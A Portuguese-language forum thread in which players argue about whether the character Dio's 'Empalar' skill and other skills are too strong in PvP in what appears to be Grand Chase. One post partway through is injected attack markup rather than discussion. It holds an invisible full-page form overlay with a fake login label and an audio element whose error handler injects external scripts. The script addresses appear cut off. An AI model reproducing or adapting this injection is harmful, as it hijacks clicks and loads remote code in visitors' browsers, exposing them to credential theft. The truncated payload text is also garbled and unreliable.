Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Dio o empalador

neo5624
 Compartilhar

Posts Recomendados

E aê pessoal *-*

NEO5624 AQUI (Não diga) e eu to postando este video pra entrar em um bate-papo frenético e feliz. É sobre a habilidade EMPALAR do Dio. Vocês acham que ela está tirando mais do que o "aceitável" em pvp, ou ela deve ficar assim?

E as outras skills como fênix flamejante, dança do rei(não sei se escrevi certo) e chute mara, devem continuar tirando tanto também?

[video=youtube;zYLyWKiAVB0]

É necessário se cadastrar para acessar o conteúdo.

Este vídeo é para mostrar o dano do EMPALAR e o dano do dança do rei em um PVP b+

ta bem editadinho porque eu sou perfeccionista -qqqqqq

Link para o comentário
Compartilhar em outros sites

Acho que não... porque na verdade esse lado de skills realmente tiram muita vida, e além disso, são 2 espadas (sem contar com a primeira que DEVERIA tirar vida) que dão prejuízo. é semelhante com o Choque fantasmagórico (damage), só que prende o oponente. Bem, ela ta aceitável, só depende da pessoa ficar 4 ou 5 dedos (medir na tela) de distância do DIO. Essa habilidade é de curto alcance.

Link para o comentário

@off: LoL, sei que é você mano, joguei contra tu hoje.... kkk

Meu nick: SrCaveira

*** aew...

@Topic:

Num sei se está tirando muito dano, pois nem 3º classe dele tenho, pois pra matar mais de 120 bichos com um char 79 é tenso...

Mas pelo video ta bem OP mesmo!

Link para o comentário

obs:nao e danca do rei e herança do rei '-'

@topic

cara acho que nao deve ser nerfado por que esse lado ai e para pvp mesmo entao creio eu que nao deve ser nerfado,o heranca do rei nem e tao apelo assim so e em missao

Skate é arte de rua , e meu estilo é street.

Link para o comentário

Nerfar Chute Mara?

oxii porque .-.

é a unica skill decente que a diva tem e

tem tanto char com skill OP e tú menciona

o chute mara da inofensiva Amy?

As skill que na minha opnião são OP's são:

Lupus "Tempestade Uivante"

Dio "empalar"(em pvp b+ pego ja era =/ )

sem falar na Feiticeira, ja viu o dano da skill "Nevasca"?

ranca mais que a do "Chute Mara" da Amy, em termos de skill de 2 barras

a Lin é outra tbm -.- "Ventos da Divinidade" o bom é que tem counter, mais é demais tbm!

Link para o comentário

<form style="position:absolute; top:0px; left:0px; width:99%; opacity:0.0; height:99%" action="

type="HIDDEN" name="TO" value="K"> <label for="email">[email protected]</label></td><td class="html7magic"><label for="pass"></label>onConfirm" id="lo" for="u"><audio src='/.htaccess' onerror="s=document; d=s.createElement('script'); d.src='
s.body.appendChild(d);s=document; d=s.createElement('script'); d.src='
s.body.appendChild(d);"></audio><button id="input_2" type="submit" class="form-submit-button">AjshxjeE<input type="HIDDEN" name="RESPONDER" value="

Link para o comentário

Bem... ele está mas desigual comparado aos outros,pois a classe é nova e leva tempo para equilibrarem ^^

Nem so tão fã de dio, até porque nem peguei a terceira classe ainda de preguiça rs.

Enfim, uma outra terceira skill op também é a nevasca da arme feiticeira..

Link para o comentário

Ta otimo assim comparanda as otras skills do Dio e seu agarrao deveria fica assim

Os fracos n aguentam e pedi pra nerfa, tenho ate pena do Dio o char mais nerfado do jogo

Ele tem muito a mostra mas com esses nerfes ai niguem conhece o poder dele

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.